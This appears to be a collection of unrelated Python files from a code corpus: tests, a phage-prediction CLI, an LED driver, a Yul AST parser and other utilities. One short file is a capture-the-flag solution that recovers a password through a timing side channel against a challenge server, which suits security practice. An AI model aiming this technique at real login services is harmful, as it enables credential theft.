quote = "Hello, World"
ingredients = [""]
instructions = [""]
expected = "pie-shell-script"
# When
recipe = Recipe(
name, residence, category, recipe_name, quote, ingredients, instructions
)
# Then
assert expected == recipe.slug
|
23315
|
import requests
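# Timing side-channel sketch: the remote check is assumed to compare the
# submitted password character by character, so a correct next character makes
# the request measurably slower. For each candidate character the loops below
# accumulate five response times and append the slowest candidate to the flag.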
text = "0123456789abcdefghijklmnopqrstuvwxyz_}"
flag = "hsctf{"
for _ in range(30):
time = [0.1 for _ in range(38)]
for _ in range(5):
for i in range(38):
payload = {"password": flag + text[i]}
r = requests.post(
"https://networked-password.web.chal.hsctf.com", data=payload
)
response_time = r.elapsed.total_seconds()
time[i] += response_time
print(payload, " response time : ", response_time)
flag += text[time.index(max(time))]
print("flag is ", flag)
|
23327
|
from __future__ import absolute_import
import argparse
import logging
import multiprocessing
import os
import sys
import uuid
from os.path import join, exists
import yaml
from phigaro.context import Context
from phigaro.batch.runner import run_tasks_chain
from phigaro.batch.task.path import sample_name
from phigaro.batch.task.prodigal import ProdigalTask
from phigaro.batch.task.hmmer import HmmerTask
from phigaro.batch.task.dummy import DummyTask
from phigaro.batch.task.preprocess import PreprocessTask
from phigaro.batch.task.run_phigaro import RunPhigaroTask
from phigaro._version import __version__
def parse_substitute_output(subs):
subs = subs or []
res = {}
for sub in subs:
task_name, output = sub.split(":")
res[task_name] = DummyTask(output, task_name)
return res
def create_task(substitutions, task_class, *args, **kwargs):
# TODO: refactor to class Application
task = task_class(*args, **kwargs)
if task.task_name in substitutions:
print(
'Substituting output for {}: {}'.format(
task.task_name, substitutions[task.task_name].output()
)
)
return substitutions[task.task_name]
return task
def clean_fold():
is_empty = True
for root, dirs, files in os.walk('proc', topdown=False):
for name in files:
is_empty = False
break
if is_empty:
for name in dirs:
os.rmdir(os.path.join(root, name))
if is_empty:
os.rmdir('proc')
def main():
default_config_path = join(os.getenv('HOME'), '.phigaro', 'config.yml')
parser = argparse.ArgumentParser(
prog='phigaro',
        description='Phigaro is a scalable command-line tool for predicting phages and prophages '
        'from nucleic acid sequences',
)
parser.add_argument(
'-V',
'--version',
action='version',
version='%(prog)s {version}'.format(version=__version__),
)
parser.add_argument(
'-f',
'--fasta-file',
help='Assembly scaffolds/contigs or full genomes, required',
required=True,
)
parser.add_argument(
'-c',
'--config',
default=default_config_path,
        help='Path to the config file, not required. The default is %s' % default_config_path,
)
parser.add_argument(
'-v', '--verbose', action='store_true', help=argparse.SUPPRESS
)
parser.add_argument(
'-p',
'--print-vogs',
help='Print phage vogs for each region',
action='store_true',
)
parser.add_argument(
'-e',
'--extension',
default=['html'],
nargs='+',
help='Type of the output: html, tsv, gff, bed or stdout. Default is html. You can specify several file formats with a space as a separator. Example: -e tsv html stdout.',
)
parser.add_argument(
'-o',
'--output',
default='',
help='Output filename for html and txt outputs. Required by default, but not required for stdout only output.',
)
parser.add_argument(
'--not-open',
help='Do not open html file automatically, if html output type is specified.',
action='store_true',
)
parser.add_argument(
'-t',
'--threads',
type=int,
default=multiprocessing.cpu_count(),
help='Num of threads ('
'default is num of CPUs={})'.format(multiprocessing.cpu_count()),
)
parser.add_argument(
'--no-cleanup', action='store_true', help="Do not delete any temporary files that was generated by Phigaro (HMMER & Prodigal outputs and some others)."
)
parser.add_argument(
'-S',
'--substitute-output',
action='append',
        help='If you have precomputed prodigal and/or hmmer data you can provide paths to the files in the following format: program:address/to/the/file. In place of program you should write hmmer or prodigal. If you need to provide both files you should pass them separately as two parameters.',
)
parser.add_argument(
'--save-fasta',
action='store_true',
help='Save all phage fasta sequences in a fasta file.',
)
parser.add_argument(
'-d',
'--delete-shorts',
action='store_true',
help='Exclude sequences with length < 20000 automatically.',
)
parser.add_argument(
'-m',
'--mode',
default='basic',
help='You can launch Phigaro at one of 3 modes: basic, abs, without_gc. Default is basic. Read more about modes at https://github.com/bobeobibo/phigaro/',
)
parser.add_argument(
'--wtp',
action='store_true',
help=argparse.SUPPRESS
)
args = parser.parse_args()
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARN)
logging.getLogger('sh.command').setLevel(logging.WARN)
logger = logging.getLogger(__name__)
if not exists(args.config):
# TODO: pretty message
print('Please, create config file using phigaro-setup script')
exit(1)
args.extension = [atype.lower() for atype in args.extension]
for ext in args.extension:
if ext not in ['html', 'gff', 'bed', 'tsv', 'stdout']:
print(
                'Error! Unknown output format in the -e/--extension parameter: %s. Please, choose one or several from the list: html, gff, bed, tsv, stdout' % ext
)
exit(1)
if (args.output == '') and (args.extension != ['stdout']):
print(
'Error! Argument -o/--output is required or change the type of the output to stdout.'
)
exit(1)
with open(args.config) as f:
logger.info('Using config file: {}'.format(args.config))
config = yaml.load(f, Loader=yaml.FullLoader)
config['phigaro']['wtp'] = args.wtp
config['phigaro']['print_vogs'] = args.print_vogs
config['phigaro']['filename'] = args.fasta_file
config['phigaro']['no_html'] = (
True if 'html' not in args.extension else False
)
config['phigaro']['not_open'] = args.not_open
config['phigaro']['output'] = (args.output+'/'+os.path.splitext(os.path.basename(args.fasta_file))[0]+'.phigaro').replace('//', '/')
config['phigaro']['uuid'] = uuid.uuid4().hex
config['phigaro']['delete_shorts'] = args.delete_shorts
config['phigaro']['gff'] = True if ('gff' in args.extension) else False
config['phigaro']['bed'] = True if ('bed' in args.extension) else False
config['phigaro']['mode'] = args.mode
config['phigaro']['save_fasta'] = args.save_fasta
filename = args.fasta_file
sample = '{}-{}'.format(sample_name(filename), config['phigaro']['uuid'])
if args.wtp:
config['phigaro']['not_open'] = True
config['phigaro']['gff'] = True
config['phigaro']['bed'] = True
args.extension.append('tsv')
config['phigaro']['delete_shorts'] = True
config['phigaro']['print_vogs'] = True
config['phigaro']['output_wtp'] = args.output + '/phigaro.txt'
config['phigaro']['output'] = args.output +'/phigaro/phigaro'
config['phigaro']['save_fasta'] = True
if config['phigaro']['output'] != '':
fold = os.path.dirname(config['phigaro']['output'])
if fold and not os.path.isdir(fold):
os.makedirs(fold)
if args.wtp:
fold = os.path.dirname(config['phigaro']['output_wtp'])
if fold and not os.path.isdir(fold):
os.makedirs(fold)
Context.initialize(
sample=sample, config=config, threads=args.threads,
)
substitutions = parse_substitute_output(args.substitute_output)
preprocess_task = create_task(substitutions, PreprocessTask, filename)
prodigal_task = create_task(
substitutions, ProdigalTask, preprocess_task=preprocess_task
)
hmmer_task = create_task(
substitutions, HmmerTask, prodigal_task=prodigal_task
)
run_phigaro_task = create_task(
substitutions,
RunPhigaroTask,
prodigal_task=prodigal_task,
hmmer_task=hmmer_task,
)
tasks = [preprocess_task, prodigal_task, hmmer_task, run_phigaro_task]
task_output_file = run_tasks_chain(tasks)
if ('tsv' in args.extension) or ('stdout' in args.extension):
with open(task_output_file) as f:
f = list(f)
            if 'tsv' in args.extension:
                # Write the tsv copy to its own handle so it is always closed.
                with open(config['phigaro']['output'] + '.tsv', 'w') as out_f:
                    for line in f:
                        out_f.write(line)
            if 'stdout' in args.extension:
                # Do not close sys.stdout; just stream the result to it.
                for line in f:
                    sys.stdout.write(line)
if not args.no_cleanup:
for t in tasks:
t.clean()
clean_fold()
if __name__ == '__main__':
main()
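# Example invocation matching the argument parser above (file names, output
# prefix and thread count are placeholders):
#   phigaro -f assembly.fasta -e tsv html -o results/sample1 -t 4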
|
23374
|
import unittest
import uuid
from memory.client import MemoryClient
from hailtop.aiocloud.aiogoogle import GoogleStorageAsyncFS
from hailtop.config import get_user_config
from hailtop.utils import async_to_blocking
from gear.cloud_config import get_gcp_config
PROJECT = get_gcp_config().project
class BlockingMemoryClient:
def __init__(self, gcs_project=None, fs=None, deploy_config=None, session=None, headers=None, _token=None):
self._client = MemoryClient(gcs_project, fs, deploy_config, session, headers, _token)
async_to_blocking(self._client.async_init())
def _get_file_if_exists(self, filename):
return async_to_blocking(self._client._get_file_if_exists(filename))
def read_file(self, filename):
return async_to_blocking(self._client.read_file(filename))
def write_file(self, filename, data):
return async_to_blocking(self._client.write_file(filename, data))
def close(self):
return async_to_blocking(self._client.close())
class Tests(unittest.TestCase):
def setUp(self):
bucket_name = get_user_config().get('batch', 'bucket')
token = uuid.uuid4()
self.test_path = f'gs://{bucket_name}/memory-tests/{token}'
self.fs = GoogleStorageAsyncFS(project=PROJECT)
self.client = BlockingMemoryClient(fs=self.fs)
self.temp_files = set()
def tearDown(self):
async_to_blocking(self.fs.rmtree(None, self.test_path))
self.client.close()
async def add_temp_file_from_string(self, name: str, str_value: bytes):
handle = f'{self.test_path}/{name}'
async with await self.fs.create(handle) as f:
await f.write(str_value)
return handle
def test_non_existent(self):
for _ in range(3):
self.assertIsNone(self.client._get_file_if_exists(f'{self.test_path}/nonexistent'))
def test_small_write_around(self):
async def read(url):
async with await self.fs.open(url) as f:
return await f.read()
cases = [('empty_file', b''), ('null', b'\0'), ('small', b'hello world')]
for file, data in cases:
handle = async_to_blocking(self.add_temp_file_from_string(file, data))
expected = async_to_blocking(read(handle))
self.assertEqual(expected, data)
i = 0
cached = self.client._get_file_if_exists(handle)
while cached is None and i < 10:
cached = self.client._get_file_if_exists(handle)
i += 1
self.assertEqual(cached, expected)
def test_small_write_through(self):
cases = [('empty_file2', b''), ('null2', b'\0'), ('small2', b'hello world')]
for file, data in cases:
filename = f'{self.test_path}/{file}'
self.client.write_file(filename, data)
cached = self.client._get_file_if_exists(filename)
self.assertEqual(cached, data)
|
23377
|
import librosa
import numpy as np
from . import base
from . import spectral
class OnsetStrength(base.Computation):
"""
Compute a spectral flux onset strength envelope.
Based on http://librosa.github.io/librosa/generated/librosa.onset.onset_strength.html
Args:
n_mels (int): Number of mel bands to generate.
"""
def __init__(self, n_mels=128, parent=None, name=None):
super(OnsetStrength, self).__init__(left_context=1, right_context=0, parent=parent, name=name)
self.n_mels = n_mels
def compute(self, chunk, sampling_rate, corpus=None, utterance=None):
        # Compute mel-spectrogram
power_spec = np.abs(spectral.stft_from_frames(chunk.data.T)) ** 2
mel = np.abs(librosa.feature.melspectrogram(S=power_spec, n_mels=self.n_mels, sr=sampling_rate))
mel_power = librosa.power_to_db(mel)
# Compute onset strengths
oenv = librosa.onset.onset_strength(S=mel_power, center=False)
# Switch dimensions and add dimension to have frames
oenv = oenv.T.reshape(oenv.shape[0], -1)
# Remove context
oenv = oenv[chunk.left_context:oenv.shape[0] - chunk.right_context]
return oenv
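# The left_context=1 requested in __init__ supplies the one extra preceding
# frame that the spectral-flux difference inside librosa.onset.onset_strength
# needs; the context frames are trimmed off again before the envelope is returned.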
|
23381
|
import numpy as np
from graph_tiger.graphs import o4_graph, p4_graph, c4_graph, k4_1_graph, k4_2_graph
from graph_tiger.graphs import two_c4_0_bridge, two_c4_1_bridge, two_c4_2_bridge, two_c4_3_bridge
from graph_tiger.measures import run_measure
def test_measures():
    measure_ground_truth = {  # graph order: o4, p4, c4, k4_1, k4_2, 2c4_0, 2c4_1, 2c4_2, 2c4_3
'node_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'edge_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'diameter': [None, 3, 2, 2, 1, None, 5, 5, 5],
'average_distance': [None, 1.67, 1.33, 1.17, 1, None, 2.29, 2.29, 2.29],
'average_inverse_distance': [0, 0.72, 0.83, 0.92, 1.0, 0.36, 0.58, 0.58, 0.58],
'average_vertex_betweenness': [0, 4, 3.5, 3.25, 3, 3.5, 11.5, None, None],
'average_edge_betweenness': [0, 3.33, 2.0, 1.4, 1, 2, 7.11, 7.11, 7.11],
'average_clustering_coefficient': [0, 0, 0, 0.83, 1, 0, 0, None, None],
'largest_connected_component': [1, 4, 4, 4, 4, 4, 8, 8, 8],
'spectral_radius': [0, 1.62, 2, 2.56, 3, 2, 2.34, 2.9, 3.65],
'spectral_gap': [0, 1, 2, 2.56, 4, 0, 0.53, 1.19, 2],
'natural_connectivity': [0, 0.65, 0.87, 1.29, 1.67, 0.87, 0.97, 1.28, 1.81],
'spectral_scaling': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'generalized_robustness_index': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'algebraic_connectivity': [0, 0.59, 2, 2, 4, 0, 0.29, 0.4, 0.45],
'number_spanning_trees': [0, 1, 4, 8, 16, 0, 16, 32, 48],
'effective_resistance': [np.inf, 10, 5, 4, 3, np.inf, 46, 38, 35.33]
}
graphs = [o4_graph(), p4_graph(), c4_graph(), k4_1_graph(), k4_2_graph(),
two_c4_0_bridge(), two_c4_1_bridge(), two_c4_2_bridge(), two_c4_3_bridge()]
for measure_name, graph_values in measure_ground_truth.items():
for idx, graph in enumerate(graphs):
value = run_measure(graph, measure_name)
if value is not None: value = round(value, 2)
# print(idx, measure_name, value)
            assert value == graph_values[idx]
def main():
test_measures()
if __name__ == '__main__':
main()
|
23385
|
import spidev
columns = [0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8]
LEDOn = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
LEDOff = [0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0]
LEDEmoteSmile = [0x0,0x0,0x24,0x0,0x42,0x3C,0x0,0x0]
LEDEmoteSad = [0x0,0x0,0x24,0x0,0x0,0x3C,0x42,0x0]
LEDEmoteTongue = [0x0,0x0,0x24,0x0,0x42,0x3C,0xC,0x0]
LEDEmoteSurprise = [0x0,0x0,0x24,0x0,0x18,0x24,0x24,0x18]
spi = None
def setup(robot_config):
global LEDEmoteSmile
global LEDEmoteSad
global LEDEmoteTongue
    global LEDEmoteSurprise
global module
global spi
#LED controlling
spi = spidev.SpiDev()
spi.open(0,0)
#VCC -> RPi Pin 2
#GND -> RPi Pin 6
#DIN -> RPi Pin 19
#CLK -> RPi Pin 23
#CS -> RPi Pin 24
    # Decode-mode register (0x09): 0x00 = no BCD decoding, raw segment data
spi.writebytes([0x09])
spi.writebytes([0x00])
# Start with low brightness
spi.writebytes([0x0a])
spi.writebytes([0x03])
# scanlimit; 8 LEDs
spi.writebytes([0x0b])
spi.writebytes([0x07])
# Enter normal power-mode
spi.writebytes([0x0c])
spi.writebytes([0x01])
    # Display-test register (0x0f): 0x00 = normal operation (test mode off)
spi.writebytes([0x0f])
spi.writebytes([0x00])
rotate = robot_config.getint('max7219', 'ledrotate')
if rotate == 180:
LEDEmoteSmile = LEDEmoteSmile[::-1]
LEDEmoteSad = LEDEmoteSad[::-1]
LEDEmoteTongue = LEDEmoteTongue[::-1]
LEDEmoteSurprise = LEDEmoteSurprise[::-1]
SetLED_Off()
def SetLED_On():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOn[i]])
def SetLED_Off():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOff[i]])
def SetLED_E_Smiley():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSmile[i]])
def SetLED_E_Sad():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSad[i]])
def SetLED_E_Tongue():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteTongue[i]])
def SetLED_E_Surprised():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSurprise[i]])
def SetLED_Low():
# brightness MIN
spi.writebytes([0x0a])
spi.writebytes([0x00])
def SetLED_Med():
#brightness MED
spi.writebytes([0x0a])
spi.writebytes([0x06])
def SetLED_Full():
# brightness MAX
spi.writebytes([0x0a])
spi.writebytes([0x0F])
def move(args):
command = args['command']
if command == 'LED_OFF':
SetLED_Off()
if command == 'LED_FULL':
SetLED_On()
SetLED_Full()
if command == 'LED_MED':
SetLED_On()
SetLED_Med()
if command == 'LED_LOW':
SetLED_On()
SetLED_Low()
if command == 'LED_E_SMILEY':
SetLED_On()
SetLED_E_Smiley()
if command == 'LED_E_SAD':
SetLED_On()
SetLED_E_Sad()
if command == 'LED_E_TONGUE':
SetLED_On()
SetLED_E_Tongue()
if command == 'LED_E_SURPRISED':
SetLED_On()
        SetLED_E_Surprised()
|
23457
|
import operator
from amino.either import Left, Right
from amino import Empty, Just, Maybe, List, Either, _
from amino.test.spec_spec import Spec
from amino.list import Lists
class EitherSpec(Spec):
def map(self) -> None:
a = 'a'
b = 'b'
Right(a).map(_ + b).value.should.equal(a + b)
Left(a).map(_ + b).value.should.equal(a)
def optional(self) -> None:
a = 'a'
b = 'b'
Right(a).to_maybe.should.just_contain(a)
Left(a).to_maybe.should.be.a(Empty)
Right(a).to_either(b).should.equal(Right(a))
Left(a).to_either(b).should.equal(Left(a))
def ap2(self) -> None:
a = 'a'
b = 'b'
Right(a).ap2(Right(b), operator.add).should.equal(Right(a + b))
def traverse(self) -> None:
a = 'a'
Right(Just(a)).sequence(Maybe).should.equal(Just(Right(a)))
Left(Just(a)).sequence(Maybe).should.equal(Just(Left(Just(a))))
List(Right(a)).sequence(Either).should.equal(Right(List(a)))
List(Right(a), Left(a)).sequence(Either).should.equal(Left(a))
def fold_m(self) -> None:
def f(z: int, a: int) -> Either[str, int]:
return Right(z + a) if a < 5 else Left('too large')
Lists.range(5).fold_m(Right(8))(f).should.contain(18)
Lists.range(6).fold_m(Right(8))(f).should.be.left
def list_flat_map(self) -> None:
(List(Right(1), Left(2), Right(3)).join).should.equal(List(1, 3))
__all__ = ('EitherSpec',)
|
23471
|
import os
client_id = os.environ['BOT_CLIENT_ID']
client_secret = os.environ['BOT_CLIENT_SECRET']
user_agent = os.environ['BOT_USER_AGENT']
username = os.environ['BOT_USERNAME']
password = os.environ['BOT_PASSWORD']
num_subs = int(os.environ['BOT_SUB_COUNT'])
sub_settings = [[
os.environ['BOT_SUBREDDIT' + i],
int(os.environ['BOT_TOP_DAYS' + i]) if 'BOT_TOP_DAYS' + i in os.environ else None,
int(os.environ['BOT_HOT_DAYS' + i]) if 'BOT_HOT_DAYS' + i in os.environ else None,
int(os.environ['BOT_NEW_DAYS' + i]) if 'BOT_NEW_DAYS' + i in os.environ else None,
int(os.environ['BOT_TOP_NUM_POSTS' + i]) if 'BOT_TOP_NUM_POSTS' + i in os.environ else 1000,
int(os.environ['BOT_HOT_NUM_POSTS' + i]) if 'BOT_HOT_NUM_POSTS' + i in os.environ else 1000,
int(os.environ['BOT_NEW_NUM_POSTS' + i]) if 'BOT_NEW_NUM_POSTS' + i in os.environ else 1000,
int(os.environ['BOT_THRESH' +i]) if 'BOT_THRESH' + i in os.environ else 5,
    os.environ['BOT_TEXT_IN_IMAGE' + i].lower() in ('1', 'true', 'yes') if 'BOT_TEXT_IN_IMAGE' + i in os.environ else False,  # bool() on a non-empty string is always True, so parse the value instead
] for i in [str(x) for x in range(num_subs)]]
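# Example environment layout this module expects (all values are placeholders);
# per-subreddit variables carry the subreddit's index as a suffix:
#   BOT_CLIENT_ID=<id>  BOT_CLIENT_SECRET=<secret>  BOT_USER_AGENT=<agent>
#   BOT_USERNAME=<user>  BOT_PASSWORD=<password>  BOT_SUB_COUNT=2
#   BOT_SUBREDDIT0=aww   BOT_TOP_DAYS0=7   BOT_THRESH0=10
#   BOT_SUBREDDIT1=pics  BOT_HOT_DAYS1=1   BOT_TEXT_IN_IMAGE1=true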
|
23485
|
from __future__ import annotations
import re
from typing import Union
import warp.yul.ast as ast
from warp.yul.AstVisitor import AstVisitor
from warp.yul.WarpException import WarpException
class AstParser:
def __init__(self, text: str):
self.lines = text.splitlines()
if len(self.lines) == 0:
raise WarpException("Text should not be empty")
self.pos = 0
def parse_typed_name(self) -> ast.TypedName:
tabs = self.get_tabs()
node_type_name = self.get_word(tabs)
assert node_type_name == "TypedName:", "This node should be of type TypedNode"
self.pos += 1
assert self.get_tabs() == tabs + 1, "Wrong indentation"
node_name, node_type = self.get_word(tabs + 1).split(":")
self.pos += 1
return ast.TypedName(name=node_name, type=node_type)
def parse_literal(self) -> ast.Literal:
tabs = self.get_tabs()
assert self.get_word(tabs).startswith(
"Literal:"
), "This node should be of type Literal"
value = self.get_word(tabs + 8)
self.pos += 1
try:
value = int(value)
except ValueError:
pass
return ast.Literal(value=value)
def parse_identifier(self) -> ast.Identifier:
tabs = self.get_tabs()
assert self.get_word(tabs).startswith(
"Identifier:"
), "This node should be of type Identifier"
name = self.get_word(tabs + 11)
self.pos += 1
return ast.Identifier(name=name)
def parse_assignment(self) -> ast.Assignment:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "Assignment:"
), "This node should be of type Assignment"
self.pos += 1
assert self.get_word(tabs + 1) == "Variables:"
self.pos += 1
variables_list = self.parse_list(tabs + 1, self.parse_identifier)
assert self.get_word(tabs + 1) == "Value:"
self.pos += 1
return ast.Assignment(
variable_names=variables_list, value=self.parse_expression()
)
def parse_function_call(self) -> ast.FunctionCall:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "FunctionCall:"
), "This node should be of type FunctionCall"
self.pos += 1
return ast.FunctionCall(
function_name=self.parse_identifier(),
arguments=self.parse_list(tabs, self.parse_expression),
)
def parse_expression_statement(self) -> ast.Statement:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "ExpressionStatement:"
), "This node should be of type ExpressionStatement"
self.pos += 1
return ast.ExpressionStatement(expression=self.parse_expression())
def parse_variable_declaration(self) -> ast.VariableDeclaration:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "VariableDeclaration:"
), "This node should be of type VariableDeclaration"
self.pos += 1
assert self.get_tabs() == tabs + 1
assert self.get_word(tabs + 1) == "Variables:"
self.pos += 1
variables = self.parse_list(tabs + 1, self.parse_typed_name)
assert self.get_tabs() == tabs + 1
word = self.get_word(tabs + 1)
self.pos += 1
assert word.startswith("Value")
if word.endswith("None"):
value = None
else:
value = self.parse_expression()
return ast.VariableDeclaration(variables=variables, value=value)
def parse_block(self) -> ast.Block:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Block:", "This node should be of type Block"
self.pos += 1
return ast.Block(statements=tuple(self.parse_list(tabs, self.parse_statement)))
def parse_function_definition(self) -> ast.FunctionDefinition:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "FunctionDefinition:"
), "This node should be of type FunctionDefinition"
self.pos += 1
assert self.get_tabs() == tabs + 1 and self.get_word(tabs + 1).startswith(
"Name:"
)
fun_name = self.get_word(tabs + 7)
self.pos += 1
assert self.get_tabs() == tabs + 1 and self.get_word(tabs + 1) == "Parameters:"
self.pos += 1
params = self.parse_list(tabs + 1, self.parse_typed_name)
assert (
self.get_tabs() == tabs + 1
and self.get_word(tabs + 1) == "Return Variables:"
)
self.pos += 1
returns = self.parse_list(tabs + 1, self.parse_typed_name)
assert self.get_tabs() == tabs + 1 and self.get_word(tabs + 1) == "Body:"
self.pos += 1
body = self.parse_block()
return ast.FunctionDefinition(
name=fun_name, parameters=params, return_variables=returns, body=body
)
def parse_if(self) -> ast.If:
tabs = self.get_tabs()
assert self.get_word(tabs) == "If:", "This node should be of type If"
self.pos += 1
condition = self.parse_expression()
body = self.parse_block()
else_body = None
if self.get_tabs() > tabs:
else_body = self.parse_block()
return ast.If(condition=condition, body=body, else_body=else_body)
def parse_case(self) -> ast.Case:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Case:", "This node should be of type Case"
self.pos += 1
try:
value = self.parse_literal()
except AssertionError:
assert (
self.get_tabs() == tabs + 1 and self.get_word(tabs + 1) == "Default"
), "The value must be a literal or None (when it's the default case)"
value = None
self.pos += 1
return ast.Case(value=value, body=self.parse_block())
def parse_switch(self) -> ast.Switch:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Switch:", "This node should be of type Switch"
self.pos += 1
return ast.Switch(
expression=self.parse_expression(),
cases=self.parse_list(tabs, self.parse_case),
)
def parse_for_loop(self) -> ast.ForLoop:
tabs = self.get_tabs()
assert self.get_word(tabs) == "ForLoop:", "This node should be of type ForLoop"
self.pos += 1
return ast.ForLoop(
pre=self.parse_block(),
condition=self.parse_expression(),
post=self.parse_block(),
body=self.parse_block(),
)
def parse_break(self) -> ast.Break:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Break", "This node should be of type Break"
self.pos += 1
return ast.Break()
def parse_continue(self) -> ast.Continue:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Continue", "This node should be of type Continue"
self.pos += 1
return ast.Continue()
def parse_leave(self) -> ast.Leave:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Leave", "This node should be of type Leave"
self.pos += 1
return ast.LEAVE
def parse_node(self) -> ast.Node:
tabs = self.get_tabs()
node_type_name = self.get_word(tabs).split(":")[0]
parser_name = f"parse_{self.get_name(node_type_name)}"
parser = getattr(self, parser_name, None)
if parser is None:
raise WarpException("Wrong node type name!")
return parser()
def parse_statement(self) -> ast.Statement:
statements = [
"ExpressionStatement",
"Assignment",
"VariableDeclaration",
"FunctionDefinition",
"If",
"Switch",
"ForLoop",
"Break",
"Continue",
"Leave",
"Block",
]
tabs = self.get_tabs()
node_type_name = self.get_word(tabs).split(":")[0]
assert node_type_name in statements, "Not a valid statement"
return ast.assert_statement(self.parse_node())
def parse_expression(self) -> ast.Expression:
tabs = self.get_tabs()
node_type_name = self.get_word(tabs).split(":")[0]
assert node_type_name in [
"Literal",
"Identifier",
"FunctionCall",
], "Node type must be an expression"
return ast.assert_expression(self.parse_node())
def parse_list(self, tabs, parser):
items = []
while self.pos < len(self.lines) and self.get_tabs() > tabs:
item = parser()
items.append(item)
return items
def get_tabs(self):
tabs = 0
if self.pos < len(self.lines):
for c in self.lines[self.pos]:
if not c == "\t":
break
tabs += 1
else:
raise WarpException(
"Lines are not supposed to be filled only with tabs"
)
return tabs
def get_word(self, start: int) -> str:
return self.lines[self.pos][start:]
def get_name(self, name):
name = "_".join(re.findall("[A-Z][^A-Z]*", name))
return name.lower()
class YulPrinter(AstVisitor):
def format(self, node: ast.Node, tabs: int = 0) -> str:
return self.visit(node, tabs)
def visit_typed_name(self, node: ast.TypedName, tabs: int = 0) -> str:
return f"{node.name}"
def visit_literal(self, node: ast.Literal, tabs: int = 0) -> str:
return f"{node.value}"
def visit_identifier(self, node: ast.Identifier, tabs: int = 0) -> str:
return f"{node.name}"
def visit_assignment(self, node: ast.Assignment, tabs: int = 0) -> str:
variables = ", ".join(self.visit_list(node.variable_names))
value = self.visit(node.value, 0)
return f"{variables} := {value}"
def visit_function_call(self, node: ast.FunctionCall, tabs: int = 0) -> str:
name = self.visit(node.function_name)
args = ", ".join(self.visit_list(node.arguments))
return f"{name}({args})"
def visit_expression_statement(
self, node: ast.ExpressionStatement, tabs: int = 0
) -> str:
return self.visit(node.expression, tabs)
def visit_variable_declaration(
self, node: ast.VariableDeclaration, tabs: int = 0
) -> str:
variables = ", ".join(self.visit_list(node.variables))
value = ""
if node.value is not None:
value = f" := {self.visit(node.value)}"
return f"let {variables}{value}"
def visit_block(self, node: ast.Block, tabs: int = 0) -> str:
open_block = "{"
close_block = "}"
if self.is_short(node.statements):
statements = "".join(self.visit_list(node.statements))
return " ".join([open_block, statements, close_block])
statements = self.visit_list(node.statements, tabs + 1)
statements = ["\t" * (tabs + 1) + stmt for stmt in statements]
statements = "\n".join(statements)
close_block = "\t" * tabs + close_block
res = "\n".join([open_block, statements, close_block])
return res
def visit_function_definition(
self, node: ast.FunctionDefinition, tabs: int = 0
) -> str:
parameters = ", ".join(self.visit_list(node.parameters, 0))
ret_vars = ", ".join(self.visit_list(node.return_variables, 0))
body = self.visit(node.body, tabs)
res = f"function {node.name}({parameters})"
if len(node.return_variables) > 0:
res += f" -> {ret_vars}"
res += f" {body}"
return res
def visit_if(self, node: ast.If, tabs: int = 0) -> str:
res = f"if {self.visit(node.condition)} "
res += self.visit(node.body, tabs)
if node.else_body is not None:
res += "\n" + "\t" * tabs + "else "
res += self.visit(node.else_body, tabs)
return res
def visit_case(self, node: ast.Case, tabs: int = 0) -> str:
res = "\t" * tabs
if node.value is not None:
res += f"case {self.visit(node.value)} "
else:
res += "default "
res += self.visit(node.body, tabs)
return res
def visit_switch(self, node: ast.Switch, tabs: int = 0) -> str:
res = f"switch {self.visit(node.expression)}\n"
res += "\n".join(self.visit_list(node.cases, tabs))
return res
def visit_for_loop(self, node: ast.ForLoop, tabs: int = 0) -> str:
res = "for "
res += self.visit(node.pre, tabs)
res += f" {self.visit(node.condition)} "
res += self.visit(node.post, tabs)
res += f"\n{self.visit(node.body, tabs)}"
return res
def visit_break(self, node: ast.Break, tabs: int = 0) -> str:
return "break"
def visit_continue(self, node: ast.Continue, tabs: int = 0) -> str:
return "continue"
def visit_leave(self, node: ast.Leave, tabs: int = 0) -> str:
return "leave"
def is_short(self, stmts: tuple) -> bool:
if len(stmts) == 0:
return True
return len(stmts) == 1 and type(stmts[0]).__name__ not in [
"Block",
"FunctionDefinition",
"If",
"Switch",
"ForLoop",
]
|
23495
|
import theano
import theano.tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.nnet.conv import conv2d
from theano.tensor.signal.downsample import max_pool_2d
from theano.tensor.shared_randomstreams import RandomStreams
import numpy as np
from toolbox import *
from modelbase import *
import itertools
import os  # needed by save(); not guaranteed to be re-exported by the star imports above
class FFN_ace(ModelSLBase):
"""
Auto-classifier-encoder (Georgiev, 2015)
"""
def save(self):
if not os.path.exists('savedmodels\\'):
os.makedirs('savedmodels\\')
self.params.save(self.filename)
def __init__(self, data, hp):
super(FFN_ace, self).__init__(self.__class__.__name__, data, hp)
# batch_size: 10000; learning_rate = 0.0015; lr_halflife = 200, 500
self.epsilon = 0.0001
self.params = Parameters()
self.shared_vars = Parameters()
n_x = self.data['n_x']
n_y = self.data['n_y']
n_h1 = 1200
n_h2 = 1000
n_h3 = 800
n_h4 = 800
scale = hp.init_scale
if hp.load_model and os.path.isfile(self.filename):
self.params.load(self.filename)
else:
with self.params:
w_h = shared_normal((n_x, n_h1), scale=scale)
b_h = shared_zeros((n_h1,))
